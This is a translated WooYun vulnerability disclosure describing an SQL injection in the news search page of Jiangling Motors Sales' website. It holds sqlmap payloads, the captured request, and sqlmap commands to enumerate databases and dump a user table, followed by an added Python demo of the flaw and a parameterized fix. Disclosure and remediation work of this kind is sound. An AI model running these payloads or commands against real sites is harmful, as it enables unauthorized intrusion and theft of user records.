Vulnerability Summary
Defect ID: wooyun-2015-0134404
Title: SQL injection vulnerability on a site of Jiangling Motors Sales Co., Ltd. (江铃汽车销售有限公司)
Vendor: cncert (National Internet Emergency Center)
Author: 毛毛虫
Submitted: 2015-08-19 22:30
Fixed: 2015-10-05 17:40
Disclosed: 2015-10-05 17:40
Vulnerability type: SQL injection
Severity: Medium
Self-assessed Rank: 10
Status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability Details
Disclosure timeline:
2015-08-19: Details reported to the vendor, awaiting vendor handling
2015-08-21: cncert National Internet Emergency Center was unable to reach the affected organization; details disclosed only to the reporting agency
2015-08-31: Details disclosed to core white hats and domain experts
2015-09-10: Details disclosed to regular white hats
2015-09-20: Details disclosed to intern white hats
2015-10-05: Details disclosed to the public
Brief description:
Jiangling Motors Sales Co., Ltd. (江铃汽车销售有限公司)
Address: No. 3 Jiangling West 4th Road, Nanchang, Jiangxi Province
Postal code: 330001
Website: http://www.myjmc.com.cn
Customer toll-free hotline: 800-869-1099
Detailed description:
1. Captured request (code area):
GET /index.php/news/search?keywords=999999 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/index.php/news/search?keywords=111
Cookie: PHPSESSID=6cpee61hip116h8dsbsi29h903; Hm_lvt_069e776b1495e9b50007090e3fbb17ba=1439650601; Hm_lpvt_069e776b1495e9b50007090e3fbb17ba=1439650608; _5t_trace_sid=1b4d4f417446e8093c08ed5a740a3a39; _5t_trace_tms=1
Connection: keep-alive
2. Injection point: the keywords parameter, with payloads (GET)
Parameter: keywords (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: keywords=-4081%' OR 8461=8461 AND '%'='
Vector: OR [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: keywords=111%' AND (SELECT 4165 FROM(SELECT COUNT(*),CONCAT(0x716b787a71,(SELECT (ELT(4165=4165,1))),0x71626a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
3. Server information
DBMS is MySQL 5.0
web application technology: PHP 5.3.3, Nginx
4. Commands run
sqlmap.py -u "http://**.**.**.**/index.php/news/search?keywords=111" --risk=3 -v 3 --dbs (retrieve the database names)
sqlmap.py -u "http://**.**.**.**/index.php/news/search?keywords=111" --risk=3 -v 3 --dbs -D jiangling --tables (example: list the tables of database jiangling)
sqlmap.py -u "http://**.**.**.**/index.php/news/search?keywords=111" --risk=3 -v 3 --dbs -D jiangling -T user_info --dump (example: dump the contents of table user_info)
Proof of vulnerability:
1. Database names
available databases [7]:
[*] information_schema
[*] jiangling
[*] leibotech
[*] mysql
[*] repldb
[*] test
[*] yuhu
2. Example: tables in database jiangling
Database: jiangling
[80 tables]
3. Example: partial contents dumped from table user_info
Remediation:
Filter input at the injection point.
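As an added illustration that is not part of the original report, the following Python/SQLite model shows why the keywords parameter behaved as sqlmap reports and what the remediation looks like in code: the vulnerable function concatenates the search term into a LIKE clause (the `%'` in the payloads suggests the original query wrapped the term in `LIKE '%...%'`), so the boolean-based payload from section 2 makes the WHERE clause true for every row, while the fixed function binds the pattern as a parameter and escapes LIKE wildcards. The site itself runs PHP/MySQL; the table, rows and function names here are constructed for the demo.

```python
import sqlite3

# Constructed sample rows standing in for the site's news table (not real data).
NEWS = [
    (1, "JMC launches new pickup"),
    (2, "Dealer conference 2015"),
    (3, "Service campaign notice"),
    (4, "Financing at 0% interest"),
]

# Boolean-based blind payload exactly as sqlmap reported it on the page (URL-decoded).
BLIND_PAYLOAD = "-4081%' OR 8461=8461 AND '%'='"


def _db():
    """Fresh in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", NEWS)
    return conn


def search_vulnerable(keywords):
    """Models the reported flaw: user input is spliced into the LIKE pattern.
    The payload closes the quote and appends OR 8461=8461, so every row matches."""
    sql = "SELECT id FROM news WHERE title LIKE '%" + keywords + "%'"
    return [row[0] for row in _db().execute(sql)]


def search_fixed(keywords):
    """Hardened version: the whole pattern travels as one bound parameter, so
    quotes cannot break out of the string, and LIKE metacharacters (% _ \\) are
    escaped so a user-supplied '%' matches literally instead of as a wildcard."""
    escaped = (keywords.replace("\\", "\\\\")
                       .replace("%", "\\%")
                       .replace("_", "\\_"))
    sql = "SELECT id FROM news WHERE title LIKE ? ESCAPE '\\'"
    return [row[0] for row in _db().execute(sql, ("%" + escaped + "%",))]


if __name__ == "__main__":
    print("benign term, vulnerable:", search_vulnerable("Dealer"))   # [2]
    print("benign term, fixed:     ", search_fixed("Dealer"))        # [2]
    print("payload, vulnerable:    ", search_vulnerable(BLIND_PAYLOAD))  # [1, 2, 3, 4]
    print("payload, fixed:         ", search_fixed(BLIND_PAYLOAD))       # []
    print("literal '0%', fixed:    ", search_fixed("0%"))            # [4]
```

The benign searches return the same rows in both versions, which is the check a reviewer wants before deploying the fix; only the payload and the literal-wildcard case differ.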
Copyright notice: when reposting, credit the source 毛毛虫@乌云
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-08-21 17:39
Vendor reply:
CNVD confirms the reported vulnerability; no direct handling channel has yet been established with the software vendor (or website operator); awaiting claim.
Latest status:
None